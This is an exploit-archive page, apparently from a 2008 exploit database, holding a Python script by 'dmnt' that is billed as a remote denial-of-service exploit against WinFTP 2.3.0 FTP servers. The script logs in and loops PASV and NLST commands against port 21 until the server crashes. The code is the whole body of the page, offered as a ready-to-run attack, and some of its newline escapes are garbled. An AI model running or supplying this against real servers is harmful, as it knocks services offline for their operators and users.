WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit
# Published : 2008-10-09
# Author : dmnt
# Previous Title : MS Windows GDI+ Proof of Concept (MS08-052) #2
# Next Title : Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities

# WinFTP v2.3.0 DoS exploit
# WinFTP URL - http://www.wftpserver.com/
# DoS'ed when try to send data
# (x)dmnt
# -*- coding: windows-1252 -*-

import socket
import time
import sys

PORT = 21

def help_info():
    print ("Usage: winftp <host> <login> <password>n")
    print ("Note: anonymous is enoughtn")

def conn(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, PORT))
    except:
        print ("[+] Done!")
        sys.exit(1)

    r=sock.recv(1024)
    print "[+] " + r
    sock.send("USER %sn" %username)
    sock.send("PASS %sn" %passwd)
    sock.send("PASVn")
    sock.send("NLST -1n")
    sock.send("QUITn")
    sock.close()


print ("n[WinFTP v2.3.0 remote DoS exploit]")
print ("[(x)dmnt 2008 without any clue :)]nn")

if len(sys.argv) <> 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try: sock.connect((hostname, PORT))
    except:
        print ("[-] Connection error!")
        sock.close()
        sys.exit(1)

    while passwd:
        conn(hostname, username, passwd)
        time.sleep(0.2)

    sys.exit(0)

# www.Syue.com [2008-10-09]